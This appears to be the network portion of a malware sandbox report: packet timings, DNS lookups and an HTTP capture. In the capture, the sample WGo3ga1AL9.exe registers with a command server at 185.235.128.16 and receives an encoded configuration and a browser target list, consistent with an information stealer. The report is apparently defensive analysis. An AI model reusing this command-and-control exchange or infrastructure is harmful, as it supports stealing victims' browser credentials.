                                                                                                                                            Oct 31, 2024 17:13:02.257246971 CET4434978413.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.305552006 CET4434978013.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.306036949 CET4434978013.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.306104898 CET49780443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.306135893 CET49780443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.306154013 CET4434978013.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.306169033 CET49780443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.306174994 CET4434978013.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.308948040 CET49786443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.308990002 CET4434978613.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.309071064 CET49786443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.309195995 CET49786443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.309207916 CET4434978613.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.328830004 CET4434978113.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.328963995 CET4434978113.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.329020977 CET49781443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.329096079 CET49781443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.329096079 CET49781443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.329109907 CET4434978113.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.329116106 CET4434978113.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.331995010 CET49787443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.332041979 CET4434978713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.332101107 CET49787443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.332559109 CET49787443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.332585096 CET4434978713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.357047081 CET4434978313.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.357251883 CET4434978313.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.357306957 CET49783443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.357351065 CET49783443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.357361078 CET4434978313.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.361659050 CET49788443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.361694098 CET4434978813.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.361759901 CET49788443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.361890078 CET49788443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.361901999 CET4434978813.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.364183903 CET4434978213.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.364255905 CET4434978213.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.364294052 CET49782443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.364737988 CET49782443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.364753962 CET4434978213.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.364767075 CET49782443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.364772081 CET4434978213.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.369581938 CET49789443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.369615078 CET4434978913.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.369735956 CET49789443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.369998932 CET49789443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.370008945 CET4434978913.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.404388905 CET4434978413.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.404561043 CET4434978413.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.404622078 CET49784443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.404895067 CET49784443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.404907942 CET4434978413.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.404917955 CET49784443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.404922009 CET4434978413.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.410315037 CET49790443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.410337925 CET4434979013.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:02.410393000 CET49790443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.410680056 CET49790443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:02.410692930 CET4434979013.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.007658958 CET4434978540.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.008155107 CET49785443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:13:03.008173943 CET4434978540.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.008780956 CET49785443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:13:03.008785009 CET4434978540.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.008837938 CET49785443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:13:03.008845091 CET4434978540.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.050118923 CET4434978613.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.050636053 CET49786443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.050662041 CET4434978613.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.051129103 CET49786443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.051135063 CET4434978613.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.061975956 CET4434978713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.062926054 CET49787443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.062958002 CET4434978713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.063431025 CET49787443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.063438892 CET4434978713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.112478018 CET4434978813.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.112993956 CET49788443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.113014936 CET4434978813.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.113488913 CET49788443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.113493919 CET4434978813.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.119100094 CET4434978913.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.119505882 CET49789443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.119523048 CET4434978913.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.119918108 CET49789443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.119924068 CET4434978913.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.155915022 CET4434979013.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.156543970 CET49790443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.156554937 CET4434979013.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.156999111 CET49790443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.157004118 CET4434979013.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.181488037 CET4434978613.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.181566954 CET4434978613.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.181644917 CET49786443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.181838989 CET49786443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.181858063 CET4434978613.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.181869030 CET49786443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.181874990 CET4434978613.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.184885025 CET49791443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.184978008 CET4434979113.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.185070038 CET49791443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.185210943 CET49791443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.185236931 CET4434979113.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.192466021 CET4434978713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.192938089 CET4434978713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.193007946 CET49787443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.193150043 CET49787443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.193150043 CET49787443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.193196058 CET4434978713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.193224907 CET4434978713.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.195280075 CET49792443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.195300102 CET4434979213.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.195373058 CET49792443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.195496082 CET49792443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.195506096 CET4434979213.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.246646881 CET4434978813.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.246788025 CET4434978813.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.246860027 CET49788443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.247016907 CET49788443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.247035980 CET4434978813.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.247045994 CET49788443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.247051954 CET4434978813.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.250252962 CET49793443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.250315905 CET4434979313.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.250401974 CET49793443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.250530958 CET49793443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.250550985 CET4434979313.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.259707928 CET4434978913.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.259936094 CET4434978913.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.260008097 CET49789443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.260143995 CET49789443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.260175943 CET4434978913.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.260202885 CET49789443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.260219097 CET4434978913.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.262264967 CET49794443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.262298107 CET4434979413.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.262371063 CET49794443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.262485981 CET49794443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.262499094 CET4434979413.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.287867069 CET4434979013.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.288002968 CET4434979013.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.288075924 CET49790443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.288125038 CET49790443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.288132906 CET4434979013.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.288141966 CET49790443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.288146019 CET4434979013.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.290144920 CET49795443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.290178061 CET4434979513.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.290252924 CET49795443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.290380955 CET49795443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.290405989 CET4434979513.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.428199053 CET4434978540.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.428227901 CET4434978540.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.428282976 CET4434978540.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.428288937 CET49785443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:13:03.428320885 CET4434978540.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.428337097 CET49785443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:13:03.428571939 CET49785443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:13:03.428586006 CET4434978540.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.428594112 CET49785443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:13:03.428762913 CET4434978540.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.428806067 CET4434978540.126.32.133192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.428860903 CET49785443192.168.2.440.126.32.133
                                                                                                                                            Oct 31, 2024 17:13:03.913000107 CET4434979113.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.913680077 CET49791443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.913700104 CET4434979113.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.914206982 CET49791443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.914218903 CET4434979113.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.934313059 CET4434979213.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.934631109 CET49792443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.934653997 CET4434979213.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.934987068 CET49792443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.934990883 CET4434979213.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.993127108 CET4434979413.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.993519068 CET49794443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.993527889 CET4434979413.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:03.993921995 CET49794443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:03.993925095 CET4434979413.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:04.013148069 CET4434979513.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:04.013467073 CET49795443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:04.013537884 CET4434979513.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:04.013807058 CET49795443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:04.013820887 CET4434979513.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:04.019857883 CET4434979313.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:04.020131111 CET49793443192.168.2.413.107.246.43
                                                                                                                                            Oct 31, 2024 17:13:04.020153046 CET4434979313.107.246.43192.168.2.4
                                                                                                                                            Oct 31, 2024 17:13:04.020436049 CET49793443192.168.2.413.107.246.43

                                                                                                                                            DNS Queries

                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                            Oct 31, 2024 17:12:09.579472065 CET192.168.2.41.1.1.10xa5f3Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                            Oct 31, 2024 17:12:09.580610991 CET192.168.2.41.1.1.10xd648Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                            Oct 31, 2024 17:12:13.521281004 CET192.168.2.41.1.1.10x8445Standard query (0)apis.google.comA (IP address)IN (0x0001)false
                                                                                                                                            Oct 31, 2024 17:12:13.521481037 CET192.168.2.41.1.1.10x23e7Standard query (0)apis.google.com65IN (0x0001)false
                                                                                                                                            Oct 31, 2024 17:12:14.522841930 CET192.168.2.41.1.1.10x83dfStandard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                            Oct 31, 2024 17:12:14.523030996 CET192.168.2.41.1.1.10x77d1Standard query (0)play.google.com65IN (0x0001)false
                                                                                                                                            Oct 31, 2024 17:12:30.141544104 CET192.168.2.41.1.1.10xa2c9Standard query (0)osteo9.esalnuvol.comA (IP address)IN (0x0001)false

                                                                                                                                            DNS Answers

                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                            Oct 31, 2024 17:12:09.586585999 CET1.1.1.1192.168.2.40xa5f3No error (0)www.google.com142.250.185.100A (IP address)IN (0x0001)false
                                                                                                                                            Oct 31, 2024 17:12:09.588037968 CET1.1.1.1192.168.2.40xd648No error (0)www.google.com65IN (0x0001)false
                                                                                                                                            Oct 31, 2024 17:12:13.528666973 CET1.1.1.1192.168.2.40x8445No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Oct 31, 2024 17:12:13.528666973 CET1.1.1.1192.168.2.40x8445No error (0)plus.l.google.com142.250.184.206A (IP address)IN (0x0001)false
                                                                                                                                            Oct 31, 2024 17:12:13.528867006 CET1.1.1.1192.168.2.40x23e7No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Oct 31, 2024 17:12:14.530303001 CET1.1.1.1192.168.2.40x83dfNo error (0)play.google.com216.58.206.78A (IP address)IN (0x0001)false
                                                                                                                                            Oct 31, 2024 17:12:30.454173088 CET1.1.1.1192.168.2.40xa2c9No error (0)osteo9.esalnuvol.com87.106.236.48A (IP address)IN (0x0001)false

                                                                                                                                            HTTP Packets

                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            0192.168.2.449730185.235.128.16807308C:\Users\user\Desktop\WGo3ga1AL9.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 31, 2024 17:12:01.537691116 CET89OUTGET / HTTP/1.1
                                                                                                                                            Host: 185.235.128.16
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Oct 31, 2024 17:12:02.359409094 CET203INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:12:02 GMT
                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                            Content-Length: 0
                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Oct 31, 2024 17:12:02.367902040 CET418OUTPOST /562c1eb14955c897.php HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=----CAFHDBGHJKFIDHJJJEBK
                                                                                                                                            Host: 185.235.128.16
                                                                                                                                            Content-Length: 217
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 30 35 36 46 30 45 34 31 30 37 42 31 39 35 33 34 34 38 30 31 39 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 4b 2d 2d 0d 0a
                                                                                                                                            Data Ascii: ------CAFHDBGHJKFIDHJJJEBKContent-Disposition: form-data; name="hwid"7056F0E4107B1953448019------CAFHDBGHJKFIDHJJJEBKContent-Disposition: form-data; name="build"LogsDiller------CAFHDBGHJKFIDHJJJEBK--
                                                                                                                                            Oct 31, 2024 17:12:02.707492113 CET407INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:12:02 GMT
                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Content-Length: 180
                                                                                                                                            Keep-Alive: timeout=5, max=99
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Data Raw: 4d 57 55 32 4d 6a 42 6b 59 57 56 6c 4d 54 6b 31 4d 6a 59 31 4e 6a 63 33 5a 54 41 77 5a 54 46 6a 59 54 6c 68 5a 44 4e 6d 4f 44 6b 35 4d 54 45 31 4f 47 49 31 4e 57 51 32 4d 54 51 35 5a 47 51 30 4e 44 63 7a 4f 57 56 6a 59 32 4a 69 59 57 49 78 4d 54 63 35 5a 47 49 32 4e 32 4a 68 59 6d 49 32 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 46 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d
                                                                                                                                            Data Ascii: MWU2MjBkYWVlMTk1MjY1Njc3ZTAwZTFjYTlhZDNmODk5MTE1OGI1NWQ2MTQ5ZGQ0NDczOWVjY2JiYWIxMTc5ZGI2N2JhYmI2fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDF8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
                                                                                                                                            Oct 31, 2024 17:12:02.713686943 CET469OUTPOST /562c1eb14955c897.php HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=----KFCFBAAEHCFHJJKEHJKJ
                                                                                                                                            Host: 185.235.128.16
                                                                                                                                            Content-Length: 268
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 41 41 45 48 43 46 48 4a 4a 4b 45 48 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 36 32 30 64 61 65 65 31 39 35 32 36 35 36 37 37 65 30 30 65 31 63 61 39 61 64 33 66 38 39 39 31 31 35 38 62 35 35 64 36 31 34 39 64 64 34 34 37 33 39 65 63 63 62 62 61 62 31 31 37 39 64 62 36 37 62 61 62 62 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 41 41 45 48 43 46 48 4a 4a 4b 45 48 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 41 41 45 48 43 46 48 4a 4a 4b 45 48 4a 4b 4a 2d 2d 0d 0a
                                                                                                                                            Data Ascii: ------KFCFBAAEHCFHJJKEHJKJContent-Disposition: form-data; name="token"1e620daee195265677e00e1ca9ad3f8991158b55d6149dd44739eccbbab1179db67babb6------KFCFBAAEHCFHJJKEHJKJContent-Disposition: form-data; name="message"browsers------KFCFBAAEHCFHJJKEHJKJ--
                                                                                                                                            Oct 31, 2024 17:12:02.949850082 CET1236INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:12:02 GMT
                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Content-Length: 2064
                                                                                                                                            Keep-Alive: timeout=5, max=98
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 58 45 64 76 62 32 64 73 5a 56 78 63 51 32 68 79 62 32 31 6c 58 46 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 63 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4d 48 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 57 31 70 5a 32 39 38 58 45 46 74 61 57 64 76 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 [TRUNCATED]
